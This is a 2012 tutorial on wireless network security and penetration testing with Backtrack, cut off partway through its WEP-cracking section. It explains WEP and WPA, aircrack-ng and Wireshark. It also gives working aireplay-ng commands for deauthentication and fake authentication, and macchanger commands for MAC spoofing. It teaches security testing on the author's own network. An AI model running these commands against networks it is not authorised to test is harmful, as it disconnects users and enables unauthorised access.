Security by Nuno Freitas (WIRELESS)
64
WIRELESS SECURITY AND PENTEST TUTORIAL USING BACKTRACK The tutorial about Network Security and Pentest using Backtrack that covers Networking Basics, Wireless Networks Basics, Wireless Penetration and Securing Wireless Networks. Independent Study by Nuno Freitas 27/05/2012
Transcript of Security by Nuno Freitas (WIRELESS)
WIRELESS SECURITY AND PENTEST TUTORIAL USING BACKTRACK
The tutorial about Network Security and Pentest using Backtrack that
covers Networking Basics, Wireless Networks Basics, Wireless Penetration
and Securing Wireless Networks.
Independent Study
by Nuno Freitas
27/05/2012
Nuno Freitas
1
Table of Contents
Executive Summary ………………………………………………………..……. 2
Before the fun part Start ……………………………………………………..…... 3
ARP Protocol …………………………………………………………………….. 4
Discovery of Networks ….……………………………………………………….. 6
Wireless Networks ….……………………………………………...…………….. 7
Software …………….……………………………………………...…………….. 11
Wireshark …..……….……………………………………………...…………….. 13
Wireless Deauthentication Attack ………………………………...…………….... 21
Fake Authentication ……………………………….………...…..……………….. 23
MAC Filtering ……………………………….………...…..………………….….. 27
Cracking WEP with a connected client (OPEN System) ……………….…….….. 29
Cracking WEP without a connected client (OPEN System) ……...…….…….….. 35
Cracking WEP (Shared Key Authentication) ……………….…….…….…….…. 41
Cracking WPA (Dictionary Mode) ……………….…….…….…………….….… 46
Cracking WPA (Database Mode) ……………….…….…….…………….…...…. 50
Hidden ESSID ……………….…….…….…….………………………….…...…. 55
Cracking WPA (Wi-Fi Protected Setup) ……………….………….…..............…. 57
Nuno Freitas
2
Executive Summary
Over the past months I’ve been learning about Network Security. I’ve started reading
documents like this and so I’m writing this tutorial not to teach anyone how to break
into their neighbor’s network and get free internet or valuable information. No. I’m
writing this because even not being an expert, I hope that this could be useful to those
who don’t know where to begin learning about it.
Backtrack, currently in it fifth version, Backtrack 5, is an operating system based
on Ubuntu GNU/Linux distribution and it is aimed at digital forensics and penetration
testing use. It is named after backtracking, a search algorithm.
Backtrack have tons of tools that could be useful, I’ll be talking about some that already
come with Backtrack and some other that you need to install if you are using an older
version than Backtrack 5 R2. I’ll add to this document how to install those programs.
Through the Document let’s imagine I’m an attacker, attacking Wireless Networks.
In this tutorial I’ll be using one Computer, with Windows 7 and VMware installed with
Backtrack 5 R2, the attacker computer.
I will use two routers through the Tutorials because my old Router (Conceptronic
c54brs4) doesn’t support WPS to use against Reaver so I’ll use a TP-LINK TL-
WR841ND.
Don’t forget, the attacker pc must be using a Wireless Card that supports “packet
injection” in order to perform some attacks.
Nuno Freitas
3
My Setup
Router (Conceptronic C54BRS4)
Attacker Antenna (TP-LINK TL-
WN722N)
Router (TP-LINK TL-WR841ND)
Before the fun part start
Before we start the fun part I would like to write about some network basics. Thus, this
paper will be helpful even you don’t have a really good knowledge of what it is a
network and how it works. Even if you know how a network works, you might find the
texts bellow interesting anyway.
Nuno Freitas
4
The ARP Protocol
In networks there are a variety of protocols. One of them is the ARP Protocol.
ARP stands for Address Resolution Protocol.
Before we start with the ARP Protocol, let’s just remember what are Physical Addresses
and Logical Addresses.
Physical Addresses – It’s what we know as MAC (Media Access Control) which is
associated to a device. This address is composed by 48 bits (12 hexadecimal characters)
Logical Addresses – They are what we often call as IP Address.
How does the ARP Protocol works?
In a network when a computer wants to find another one it has to know the IP of that
computer but the information inserted in the packets is the MAC Address of the
destination computer.
When you only know the IP you need to ask for the MAC. Using the ARP Protocol, that
resolves IP Addresses into MAC Addresses.
For example
Imagine a computer, let’s just say Computer A, with an IP 192.168.2.105 and it wants
to communicate with a computer with an IP 192.168.2.100, Computer B.
Nuno Freitas
5
Computer A will check its ARP Table and if it doesn’t possess Computer B’s MAC
Address it will send a message to the Address FF:FF:FF:FF:FF:FF asking the ARP
Address of Computer B. (ARP REQUEST)
Then computer B will answer to Computer A sending him his Physical Address.
Computer A will add an Entry in its ARP Table with that same MAC Address
corresponding to Computers B’s IP. (ARP REPLY)
You can check your ARP Table by typing in a Command Prompt:
#arp -a
It is also possible to translate MAC Addresses into IP Addresses but the Protocol used
in that translation is the RARP Protocol (Reverse Address Resolution Protocol).
These are some of the most important Protocols in networking and some of the easiest
Protocols to understand.
Up ahead in this tutorial we will talk more about ARP Protocol.
Nuno Freitas
6
Discovery of Wireless Networks
When you want to perform a wireless attack you need to identify the network you are
attempting to access. Sometimes the attacker knows already what network he will
attempt to break, sometimes it doesn’t so it is needed more time to figure it out.
Well, I won’t talk about how to hack a corporation because the point of this tutorial is
not “how to become a criminal or a hacktivist”, I just want to show you how easily
someone can break through your network and get free internet or data and help you to
avoid that. So I will get to the point with a general idea of scanning and not what it
really is all about.
For the next tutorials we will be scanning the airwaves in monitor mode or promiscuous
mode which is a type of scan where you don’t send any beacons or probes, instead of
that, you gather information from traffic that is already going on the air. Figuratively it's
like if your computer just sits down and read the traffic going on the airwaves and
interprets it.
To perform a passive scan a wireless card must be on “monitor mode”.
A card in monitor mode will read every wireless packet it can reach and try to
extrapolate data. As all wireless networks operate on the same frequency, the air is
usually flooded with packets from several different networks. The card picks up these
packets and deduces what network they belong to. This is different than just only trying
beacon or probe packets because there is always much more traffic than just those two
types of packets.
Not all wireless cards support monitor mode. The chipset of the card must support the
mode as well as the driver being used.
In the tutorials I’ll be using airmon-ng which is a program in aircrack-ng suite, to put
the wireless card in monitor mode.
Before we start the hacking process there are some things you should read about if
you’re a beginner. For example what are WEP and WPA encryptions? How do they
work? What is the 802.11n standard?
Let’s find about that.
Nuno Freitas
7
Wireless Networks There are two types of encryption in Wireless Networks, we have WEP that stands for
Wireless Equivalency Protocol and we have WPA which stands for Wi-Fi Protected
Access. In spite that WPA is more secure than WEP, both are vulnerable to different
types of attacks as we will see.
WEP (Wireless Equivalency Protocol)
WEP is not the best protection, however it is better than nothing, though generally not
as secure as the more sophisticated WPA/WPA2 encryption. A big problem is that if a
Cracker can sniff packets on a WEP encrypted network, it is only a matter of time until
the password is cracked.
If enough traffic can be intercepted by an attacker, then it can be broken by brute force
in a matter of minutes or even seconds. If that weren’t bad enough, the time it takes to
crack WEP only grows linearly with key length, but a 104-bit key doesn’t provide any
significant protection over a 40-bit key when faced against a determined cracker. There
are several freely available programs that allow for the cracking of WEP that’s why it is
indeed a broken solution, but it should be used over than nothing.
With WEP there are two different forms of authentication, shared key and open system.
In shared key, the client request authentication and the Wireless Access Point sends a
text which the client has to encrypt using the WEP key and send it back, if it matches
then the WAP (Wireless Access Point) authenticates and associates with the client.
In open system authentication any client can associate with the WAP. The client is
authenticated regardless of the key it possesses and begins to receive packets. The client
would need the correct key at this point to read the packets.
A WEP key is usually 128bit comprised of 26 hexadecimal values and a 24bit
Initialization Vector (IV). Each packet is encrypted using RC4 algorithm with the 26
hexadecimal values and a random IV. The packet is sent along with the IV in plain text.
The client then decrypts the packet using the hex key and the included IV.
Nuno Freitas
8
WPA (Wi-Fi Protected Access)
WPA
Wi-Fi Protected Access (WPA) is a software/firmware improvement over WEP.
All regular WLAN-equipment that worked with WEP are able to be simply upgraded
and no new equipment needs to be bought. WPA is a trimmed-down version of
the 802.11i security standard that was developed by the IEEE 802.11 to replace WEP.
The TKIP (Temporal Key Integrity Protocol) encryption algorithm was developed for
WPA to provide improvements to WEP that could be fielded as firmware upgrades to
existing 802.11 devices. The WPA profile also provides optional support for the AES-
CCMP algorithm that is the preferred algorithm in 802.11i and WPA2.
WPA Enterprise provides RADIUS based authentication using 802.1x.
WPA Personal uses a pre-shared Shared Key (PSK) to establish the security using an 8
to 63 character passphrase. The PSK may also be entered as a 64 character hexadecimal
string.
Weak PSK passphrases can be broken using a dictionary attacks by capturing the “four-
way handshake” when the client connects to the network or reconnects after being
deauthenticated.
WPA Personal is secure when used with ‘good’ passphrases or a full 64-character
hexadecimal key. They should also not use WPS (Wireless Protected Setup) since a
huge vulnerability was discovered and can be already exploited.
TKIP
This stands for Temporal Key Integrity Protocol and the acronym is pronounced as “tee-
kip”. This is part of the IEEE 802.11i standard. TKIP implements per-packet key
mixing with a re-keying system and also provides a message integrity check. These
avoid the problems of WEP.
EAP
The WPA-improvement over the IEEE 802.1X standard already improved the
authentication and authorization for access of wireless and wired LANs. In addition to
this, extra measures such as the Extensible Authentication Protocol (EAP) have initiated
an even greater amount of security. This, as EAP uses a central authentication server.
Unfortunately, during 2002 a Maryland professor discovered some shortcomings.
Nuno Freitas
9
802.11i security
The newest and most rigorous security to implement into WLAN's today is the 802.11i
RSN-standard. This full-fledged 802.11i standard (which uses WPA2) does require the
newest hardware (unlike WPA), thus potentially requiring the purchase of new
equipment. This new hardware required may be either AES-WRAP (an early version of
802.11i) or the newer and better AES-CCMP-equipment.
WPA2
WPA2 is a Wi-Fi Alliance branded version of the final 802.11i standard. The primary
enhancement over WPA is the inclusion of the AES-CCMP algorithm as a mandatory
feature. Both WPA and WPA2 support EAP authentication methods using RADIUS
servers and pre-shared key (PSK).
CCMP
CCMP stands for Counter Mode with Cipher Block Chaining Message Authentication
Code Protocol also known as (CCM mode Protocol) is an encryption protocol designed
for Wireless Networks products that implement the standards of the IEEE
802.11i amendment to the original IEEE 802.11 standard. CCMP is an enhanced data
cryptographic encapsulation mechanism designed for data confidentiality and based
upon the Counter Mode with CBC-MAC (CCM) of the AES standard. It was created to
address the vulnerabilities presented by TKIP, a protocol in WPA, and WEP, a dated,
insecure protocol.
802.11b
802.11b has a maximum raw data rate of 11 Mbit/s and uses the same media access
method defined in the original standard. 802.11b products appeared on the market in
early 2000, since 802.11b is a direct extension of the modulation technique defined in
the original standard. The dramatic increase in throughput of 802.11b (compared to the
original standard) along with simultaneous substantial price reductions led to the rapid
acceptance of 802.11b as the definitive wireless LAN technology.
802.11b devices suffer interference from other products operating in the 2.4 GHz band.
Devices operating in the 2.4 GHz range include: microwave ovens, Bluetooth devices,
baby monitors and cordless telephones.
Nuno Freitas
10
802.11g
In June 2003, a third modulation standard was ratified: 802.11g. This works in the
2.4 GHz band (like 802.11b), but uses the same OFDM based transmission scheme as
802.11a. It operates at a maximum physical layer bit rate of 54 Mbit/s exclusive of
forward error correction codes, or about 22 Mbit/s average throughputs. 802.11g
hardware is fully backwards compatible with 802.11b hardware and therefore is
encumbered with legacy issues that reduce throughput when compared to 802.11a by
21%.
The then-proposed 802.11g standard was rapidly adopted by consumers starting in
January 2003, well before ratification, due to the desire for higher data rates as well as
to reductions in manufacturing costs. By summer 2003, most dual-band 802.11a/b
products became dual-band/tri-mode, supporting a and b/g in a single mobile adapter
card or access point. Details of making b and g work well together occupied much of
the lingering technical process; in an 802.11g network, however, activity of an 802.11b
participant will reduce the data rate of the overall 802.11g network.
Like 802.11b, 802.11g devices suffer interference from other products operating in the
2.4 GHz band, for example wireless keyboards.
802.11n
802.11n is an amendment which improves upon the previous 802.11 standards by
adding multiple-input multiple-output antennas (MIMO). 802.11n operates on both the
2.4 GHz and the lesser used 5 GHz bands. The IEEE has approved the amendment and
it was published in October 2009. Prior to the final ratification, enterprises were already
migrating to 802.11n networks based on the Wi-Fi Alliance's certification of products
conforming to a 2007 draft of the 802.11n proposal.
Nuno Freitas
11
Software
During these next tutorials I’ll be using some programs under Backtrack 5, so let’s give
a brief explanation about what are those programs all about and what type of tasks they
can be used for.
Aircrack-ng
Aircrack-ng is a network software suite consisting of a detector, packet
sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless
LANs.
It works with any wireless network interface controller whose driver supports raw
monitoring mode and can sniff 802.11b, 802.11g and 802.11n traffic. The program runs
under Linux and Windows.
Features
The aircrack-ng software suite includes:
aircrack-ng - Cracks WEP and WPA (Dictionary attack) keys.
airdecap-ng - Decrypts WEP or WPA encrypted capture files with known key.
airmon-ng - Placing different cards in monitor mode.
aireplay-ng - Packet injector (Linux, and Windows).
airodump-ng - Packet sniffer: Places air traffic into PCAP or IVS files and shows
information about networks.
airtun-ng - Virtual tunnel interface creator.
airolib-ng - Stores and manages ESSID and password lists; Increases the KPS of WPA
attacks
packetforge-ng - Create encrypted packets for injection.
airbase-ng - Incorporates techniques for attacking client, as opposed to Access Points
airdecloak-ng - removes WEP cloaking from pcap files
airdriver-ng - Tools for managing wireless drivers
tkiptun-ng - WPA/TKIP attack
airserv-ng - allows you to access the wireless card from other computers.
buddy-ng - the helper server for easside-ng, run on a remote computer
easside-ng - a tool for communicating to an access point, without the WEP key
wesside-ng - automatic tool for recovering WEP key
Wireshark
Wireshark is a free and open-source packet analyzer.
Nuno Freitas
12
It is used for network troubleshooting, analysis, software and communications
protocol development, and education. Originally named Ethereal, in May 2006 the
project was renamed Wireshark due to trademark issues.
Wireshark is very useful since you can analyze every packet individually and
understand what is going on the airwaves since that Wireshark distinguishes all types of
packets travelling the wireless field.
Wireshark is cross-platform, using the GTK+ widget toolkit to implement its user
interface, and using pcap to capture packets; it runs on various Unix-like operating
systems including Linux, Mac OS X, BSD, and on Microsoft Windows.
Pyrit
Pyrit allows creating massive databases, pre-computing part of the IEEE 802.11
WPA/WPA2-PSK authentication phase in a space-time-tradeoff. Exploiting the
computational power of Many-Core- and other platforms through ATI-Stream, Nvidia
CUDA, OpenCL and VIA Padlock, it is currently by far the most powerful attack
against one of the world’s most used security-protocols.
Pyrit is free software. Everyone can inspect copy or modify it and share derived work
under the GNU General Public License v3+. It compiles and executes on a wide variety
of platforms including FreeBSD, MacOS X and Linux as operation-system and x86-,
alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors. Pyrit is a very good
tool, although it’s not included in Backtrack 5. In pyrit attack tutorial I will also explain
how to install it.
Reaver
Reaver implements a brute force attack against Wifi Protected Setup (WPS) using PINs in order
to recover WPA/WPA2 passphrases.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested
against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10
hours, depending on the AP. In practice, it will generally take half this time to guess the correct
WPS pin and recover the passphrase.
Nuno Freitas
13
Wireshark
So, as you might read before, Wireshark is a packet analyzer. Let’s learn how to work
with that tool.
Remember that Wireshark can work on every interface you have. For example you can
create a monitor mode interface and use it on Wireshark, that way you will get every
packet in the Wireless airwaves and get a big number of packets.
As you already saw with airodump-ng in Aircrack-ng suite it is very easy to get
thousands of packets in minutes or even seconds, it depends on the traffic of the
network. It would be a trouble to find some data frames in the middle of all the beacon
frames, but Wireshark have the ability to filter by type of packet or by MAC Address.
With this we get comfortable when we are trying to find specifically types of packet and
get to them faster.
First let’s talk about WLAN frames, it will help is with Wireshark and with networking
at all if we understand this.
There are three types of frames: Management Frames, Control Frames and Data Frames.
1. Management frames: They are responsible for maintaining communication between
the access points and wireless clients. There are ten types of Management Frames:
- Authentication - 802.11 authentication is a process whereby the access
point either accepts or rejects the identity of a wireless card. The Wireless
Card begins the process by sending an authentication frame containing its
identity to the access point. With open system authentication (the default),
the Wireless Card sends only one authentication frame, and the access point
responds with an authentication frame as a response indicating acceptance
(or rejection). With the optional shared key authentication, the Wireless Card
sends an initial authentication frame, and the access point responds with an
authentication frame containing challenge text. The Client must send an
encrypted version of the challenge text (using its WEP key) in an
authentication frame back to the access point. The access point ensures that
the Client has the correct WEP key (which is the basis for authentication) by
seeing whether the challenge text recovered after decryption is the same that
was sent previously. Based on the results of this comparison, the access point
replies to the Client with an authentication frame with the result of
authentication.
- De-Authentication - A station sends a deauthentication frame to another
station if it wishes to terminate secure communications.
- Association Request - 802.11 association enables the access point to
allocate resources for and synchronize with a Wireless Card. The client
begins the association process by sending an association request to an access
point. This frame carries information about the Wireless Card (supported
data rates, etc.) and the SSID of the network it wishes to associate with.
After receiving the association request, the access point considers associating
Nuno Freitas
14
with the Client, and (if accepted) reserves him some memory space and
establishes an association ID.
- Association Response - An access point sends an association response frame
containing an acceptance or rejection notice to the Wireless Card requesting
association. If the access point accepts the radio Wireless Card, the frame
includes information regarding the association, such as association ID and
supported data rates. If the outcome of the association is positive, the Client
can utilize the access point to communicate with other Clients on the
network and systems on the distribution (i.e., Ethernet) side of the access
point.
- Re-association Request - If a Wireless Card roams away from the currently
associated access point and finds another access point having a stronger
beacon signal, the Wireless Card will send a re-association frame to the new
access point. The new access point then coordinates the forwarding of data
frames that may still be in the buffer of the previous access point waiting for
transmission to the radio NIC. This is when there are several Access Points
broadcasting on the same network, not different Access points on different
networks.
- Re-association Response - An access point sends a re-association response
frame containing an acceptance or rejection notice to the Wireless Card
requesting re-association. Similar to the association process, the frame
includes information regarding the association, such as association ID and
supported data rates.
- Disassociation - A station sends a disassociation frame to another station if it
wishes to terminate the association. For example, a Wireless Card that is shut
down gracefully can send a disassociation frame to alert the access point that
the Wireless Card is powering off. The access point can then relinquish
memory allocations and remove the Wireless Card from the association
table.
- Beacon - The access point periodically sends a beacon frame to announce its
presence and relay information, such as timestamp, SSID, and other
parameters regarding the access point to Wireless Cards that are within
range. Wireless Cards continually scan all 802.11 radio channels and listen
to beacons as the basis for choosing which access point is best to associate
with.
- Probe Request - A station sends a probe request frame when it needs to
obtain information from another station. For example, a Wireless Card would
send a probe request to determine which access points are within range.
- Probe Response - A station will respond with a probe response frame,
containing capability information, supported data rates, etc., when after it
receives a probe request frame.
Nuno Freitas
15
2. Control frames: Control frames are responsible for ensuring a proper exchange of
data between the access point and wireless clients. Control frames can have the
following sub-types:
- Request to Send (RTS)
- Clear to Send (CTS)
- Acknowledgement (ACK) – Since 802.11 stations are not able to transmit and
receive at the same time, while a station is transmitting a frame, it is not able to
determine whether the frame was received or whether there was a collision.
Therefore, every time an 802.11 radio that received the frame will reply with a
14-octet acknowledgement (ACK) frame.
3. Data frames: Data frames carry the actual data sent on the wireless network. There
are no sub-types for data frames.
Now that it is explained the different types WLAN frames we are able to start with
Wireshark. This previous explanation about frames is important since in Wireshark you
will get hundreds of frames and you will need to filter them whether you need them or
not to simplify the process.
So, let’s start with Wireshark. To start Wireshark, type “wireskark&” in the console.
But before we start sniffing the airwaves let’s create a monitor mode device to sniff
every packet from every network in range. To do that just type:
#airmon-ng start wlan0
Wlan0 depends on your device, it could be wlan0, wlan1… It depends on the number of
Wireless cards you have connected and what you want to use.
To get used to it type:
#airmon-ng
The output will get from the shell will show you how many cards you have and their
Interface names.
After you have your Wireless card in monitor mode you will get a new interface, named
mon0, that new interface is a virtual interface which is nothing more than your wireless
card working on monitor mode.
That’s the interface we will use in Wireshark.
After you get Wireshark started you will get this window:
Nuno Freitas
16
This is the start window of Wireshark, to get started click in “Interface List” in Capture
below Wireshark’s logo.
You will get the list of available devices that you can use to analyze packets going on
the network. Mon0 will monitor the airwaves on the available channels in your region
and eth1 or eth0 will monitor your wired network.
Nuno Freitas
17
This is Wireshark getting packets from the air. As you can see we have some ACK
frames, some data frames. You will get hundreds or even thousands of frames while you
are sniffing the packets. Imagine that we need to search for data frames… well it would
be very difficult to find data frames in the middle of all the other frames, because there
are several types of frames and you are looking for only one type, that’s where
Wireshark filter helps a lot.
Nuno Freitas
18
Wireshark Filters
Filter by Destination, Source and Port
eth.src – With this filter you can filter by the source MAC Address (Ethernet).
Example: eth.src == 00:11:22:33:44:55
eth.dst – With this filter you can filter by destination MAC Address (Ethernet).
Example: eth.dst == 00:11:22:33:44:55
wlan.addr – This filter will filter packets by the source or destination MAC Address
(Wireless Card).
Example: wlan.addr == 00:11:22:33:44:55
wlan.sa – With this filter you can filter by the source MAC Address (Wireless Card).
Example: wlan.sa == 00:11:22:33:44:55
wlan.da – With this filter you can filter by destination MAC Address (Wireless Card).
Example: wlan.da == 00:11:22:33:44:55
wlan.bssid – With this filter you can filter only the frames from an specific Access
Point by using the MAC Address (bssid).
Example: wlan.bssid == 00:11:22:33:44:55
ip.addr – With this filter you can filter by source or destination IPv4 Address.
Example: ip.addr == 192.168.2.1
ip.dst – With this filter you can filter by destination IPv4 Address.
Example: ip.addr == 192.168.2.1
ip.src – With this filter you can filter by source IPv4 Address.
Example: ip.addr == 192.168.2.1
ipv6.addr – With this filter you can filter by source or destination IPv6 Address.
Example: ipv6.addr == 2001::5
ipv6.src – With this filter you can filter by source IPv6 Address.
Example: ipv6.addr == 2001::5
ipv6.dst – With this filter you can filter by destination IPv6 Address.
Example: ipv6.dst == 2001::5
tcp.port – With this filter you can filter packets by source or destination TCP port.
Example: tcp.port == 80
tcp.dstport – With this filter you can filter packets by destination TCP port.
Example: tcp.dstport == 80
Nuno Freitas
19
tcp.srcport – With this filter you can filter packets by source TCP port.
Example: tcp.srcport == 80
udp.port – With this filter you can filter packets by source or destination UDP port.
Example: udp.port == 80
udp.dstport – With this filter you can filter packets by destination UDP port.
Example: udp.dstport == 80
udp.srcport – With this filter you can filter packets by source UDP port.
Example: udp.srcport == 80
Filter by Types of frames
wlan.fc.type == 0 – With this filter you can filter only the Management frames.
wlan.fc.type == 1 – With this filter you can filter only the Control frames.
wlan.fc.type == 2 – With this filter you can filter only the Data frames.
Filter by Subtypes of frames
(wlan.fc.type == 0) && (wlan.fc.subtype == 1) – With this filter you can filter only the
Authentication frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 2) – With this filter you can filter only the
De-Authentication frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 3) – With this filter you can filter only the
Association Request frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 4) – With this filter you can filter only the
Association Response frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 5) – With this filter you can filter only the
Re-Association Request frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 6) – With this filter you can filter only the
Re-Association Response frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 12) – With this filter you can filter only the
Dis-Association frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 8) – With this filter you can filter only the
Beacon frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 9) – With this filter you can filter only the
Probe Request frames.
(wlan.fc.type == 0) && (wlan.fc.subtype == 10) – With this filter you can filter only the
Probe Response frames.
(wlan.fc.type == 1) && (wlan.fc.subtype == 1) – With this filter you can filter only
“Request to Send” frames.
Nuno Freitas
20
(wlan.fc.type == 1) && (wlan.fc.subtype == 2) – With this filter you can filter only
“Clear to Send” frames.
(wlan.fc.type == 1) && (wlan.fc.subtype == 3) – With this filter you can filter only
Acknowledgement frames.
(wlan.fc.type == 2) – With this filter you can filter only Data frames.
Filter Operators
!= - Exclude -With this operator you can exclude a filter option.
Image that you want to get all the Management Frames except Beacon Frames, you can
use (wlan.fc.type == 0) != (wlan.fc.subtype == 8)
&& - And- This operator can make a filter with two filter types.
If you want to filter only Authentication and De-Authentication frames, use
(wlan.fc.type == 0) == (wlan.fc.subtype == 1) && (wlan.fc.type == 0) == (wlan.fc.subtype == 2)
|| - Or – Does exactly the same then AND but it will show filter 1 OR filter 2.
Nuno Freitas
21
Wireless Deauthentication Attack
Basically this attack sends disassociation packets to one or more clients which are
currently associated with a particular access point which make them lose connection to
the AP.
There are many reasons to perform a Deauth Attack:
- Capturing WPA/WPA2 handshakes by forcing clients to re-authenticate.
- Generate ARP requests (Windows clients sometimes flush their ARP cache
when disconnected)
- Recovering a hidden ESSID.
Well there is no practical way to avoid those attacks. However it is simple to confirm if
you are being a victim of a Deauthentication Attack. To do that let’s use Wireshark.
Well to get started I will use two computers in this example. One with Backtrack 5 and
the other with Windows 7. The Windows 7 machine is already connected to the
network, TP-LINK. The role that this machine is playing is simple, it will be the victim.
On the other hand I will use a second machine running Backtrack and it will be the
Attacker and the Monitor. I will be performing a Deauthentication attack and at the
same time monitoring the Airwaves for Deauthentication packets with Wireshark.
On your case, if you want to check if your being a victim of a Deauthentication attack
you can use a machine running Wireshark, which runs on Windows and Linux…
So let’s get started, first let’s put our wireless card in Monitor mode.
#airmon-ng start wlan1
Then let’s check the networks we can reach.
#airodump-ng mon0
Then attack your own network.
Nuno Freitas
22
#aireplay-ng -0 10 -a 00:80:5A:28:B5:AB -c 00:15:AF:A2:8D:98 mon0
This command is sending deauthentication packets to the AP and making the AP to
Deauthenticate the Client.
Open Wireshark and start sniffing the airwaves.
Add the following filter to get only Deauthentication packets:
(wlan.fc.type == 0) && (wlan.fc.subtype == 12)
In Wireshark’s output we get a bunch of Deauthentication packets, and as we can see
the Source Address of those packets is the AP’s Address and you can’t know who is
performing the attack. This type of attack will be crucial in WPA Attacks as we will see
further on this tutorial.
Nuno Freitas
23
Fake Authentication
Fake Authentication is useful on WEP Attacks and it doesn’t work under WPA
networks.
In WEP Cracking Attacks we will face two types of WEP Networks, one with Open
System Authentication and the other called Shared Key Authentication.
Open system Authentication is simple to perform Fake Authentications and you can
start whenever you want, however in Shared Key Authentication Networks you will
always need a connected client.
If the network doesn’t have a connected client just wait until someone connects to the
network. We need someone from inside the network to show up because we will need a
140 bit keystream that will allow us to fake an authentication. Without that we cannot
authenticate. Remember that Open System authentication and Shared Key works
different.
Open System Fake Authentication
So, imagine that you already have your target figured it out.
In order for an access point to accept a packet, the source MAC address must already be
associated. If the source MAC address you are injecting is not associated with the
access point it will ignore the packet and sends out a "Deauthentication".
In this state, no new initialization vectors are created because the access point is
ignoring all the injected packets. The lack of association with the access point is the
single biggest reason why packet injection fails. At this point you are just connecting to
the access point and telling it you are here and want to talk to it, however this does not
give you any ability to transfer data.
Nuno Freitas
24
aireplay-ng -1 10 -a 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 mon0
Where -1 means fake authentication, 10 means re-association timing in seconds, -a is
the access point MAC address, and -h is the MAC address under which you act (either
your own or the spoofed one).
This is what the output should look like:
Shared Key Fake Authentication
First of all, as always, put your wireless card in monitor mode.
#airmon-ng start wlan0
Then let’s search for our network, WLAN will be the target Network.
#airodump-ng --bssid 00:80:5A:28:B5:AB -c 11 -w sharedkey wlan0
Using this we will sniff all the packets from WLAN network and save them in files
called wepska. We will need to perform a deauthentication on an authenticated client in
order to capture the shared key 140 bit keystream.
Nuno Freitas
25
If you try to fake authenticate as you’ve learned before you will get an error like the
following image shows…
This means that the network you are attacking now uses Shared Key Authentication
system.
So, to fake authenticate in a Shared Key network we need to deauthenticate a client.
Run airodump-ng to sniff the target network:
#airodump-ng --bssid 00:80:5A:28:B5:AB -c 11 -w sharedkey wlan0
With this you are only looking at the target’s network. As you saw before there was a
connected client, its MAC is 00:15:AF:A2:8D:98.
So let’s deauthenticate him:
#aireplay-ng -0 10 -a 00:80:5A:28:B5:AB -h 00:15:AF:A2:8D:98 mon0
Nuno Freitas
26
After you perform a deauthentication look to the top line in airodump-ng window there
is now a text saying “140 bytes keystream: 00:80:5A:28:B5:AB”
This means we have captured the .xor file we were looking for to perform a fake
authentication.
Use the following command:
#aireplay-ng -1 0 -a 00:80:5A:28:B5:AB -c 00:15:AF:A2:8D:98
-y sharedkey-01-00:80:5A:28:B5:AB.xor wlan0
With this we’ve managed to fake authenticate in a Shared Key network.
Nuno Freitas
27
Mac Filtering
In some cases you might find some security barriers, like MAC Filtering, which is still
easy to break. Imagine that you are trying to Fake Authenticate with an AP and you are
getting an Error like this:
MAC Filtering is enabled on this network. To get through this security trick we need a
legit MAC Address which have permission to connect with the AP.
Run airodump-ng and wait until someone connects to that network or if someone’s
already connected use it’s MAC Address to spoof your own.
As we can see there is one Client connected to WLAN, it’s MAC is
00:15:AF:A2:8D:98. Let’s turn it as our own MAC Address as well:
Nuno Freitas
28
#macchanger -m 00:15:AF:A2:8D:98 wlan1
This command will change Wlan1 device MAC Address into 00:15:AF:A2:8D:98.
Even if the client keeps connected to the Network you can begin to fake authenticate.
#aireplay-ng -1 10 -a 00:80:5A:28:B5:AB -h 00:15:AF:A2:8D:98 mon0
This time don’t forget to use the spoofed MAC in -h option.
This brief explanation on what is Fake Authentication will help you in WEP Cracking
that we will see later in this tutorial. With this information you shouldn’t have any
trouble by doing this trick and performing WEP Cracking.
Nuno Freitas
29
Cracking WEP with a client connected (OPEN System)
The weakness of WEP resides in the IV. It is sent as plaintext with the packet which
basically means that anyone who grabs the packet can see the first 24bits of the code
that was encrypted. The RC4 encryption algorithm can only generate about 16 million
different codes based on the IV, meaning if you gather enough of these IVs you can
crack the code throughout a brute force attack. Also contributing to the WEP’s
weakness is the discovery that some IVs are weaker than others and software can
recognize “weak” IVs and then use them to crack the key even quicker.
Once the theory of how to Crack WEP was proven possible, computer programs were
written that streamlined the process. There are two steps involved that programs take.
Once an encrypted wireless network is found and the client is in range, it begins to
intercept packets and logging the IVs. The packets contain encrypted data and are
worthless individually, but if enough IVs are logged the code can be cracked. Usually
about 50 000 IVs are needed to crack WEP. The number of IVs traveling is related to
network traffic, so if no one is connected to the network it will take days to get that
many, that’s why you need to create artificial traffic, but in the other hand if someone is
already connected you can get a lot of IVs fast without any problems.
Of course there is a method of speeding up the collection of IVs, through a certain type
of packet injection although this technique it’s not supported by all Wireless Cards.
This type of packet injection is called ARP injection. With this technique the wireless
card sends out an ARP request to the access point which then responds with an ARP
response. This response contains an IV, which is then captured. This process is repeated
rapidly to generate numerous IVs. To perform this injection, the origin of the ARP
request must be associated with the AP, or else the AP will not respond. Software is
able to spoof the origin to make the request look like it came from an associated client,
not from the attacker’s computer.
As I told you I will be using a wireless security suite called aircrack-ng that comes with
Backtrack Linux distribution for WEP attacks. Aircrack-ng contains all the tools
necessary for discovering and cracking wireless networks.
First let’s try to break a network with a connected client.
Once a network has been identified through any technique the basic steps to crack WEP
encrypted networks, and the programs used to accomplish with are:
1) Put the wireless card in passive monitor mode (airmon-ng)
2) Begin capturing packets that contain unique IVs and save them to the disk
(airodump-ng)
3) Inject ARP requests from an associated client to generate new packets (aireplay-
ng)
Nuno Freitas
30
4) Once enough IVs have been captured, run a cryptographic attack to decipher the
WEP key (aircrack-ng)
In this case, I will attack my own network so it is like if the attacker, me, had already
identified the WEP encrypted network he wants to crack. The information he will need
to start collecting IVs is the BSSID of the access point and the channel it is operating
on. When this information is easy to get using airodump-ng and it will also be used to
capture the IVs and save them to a file. In this case the BSSID of the network we are
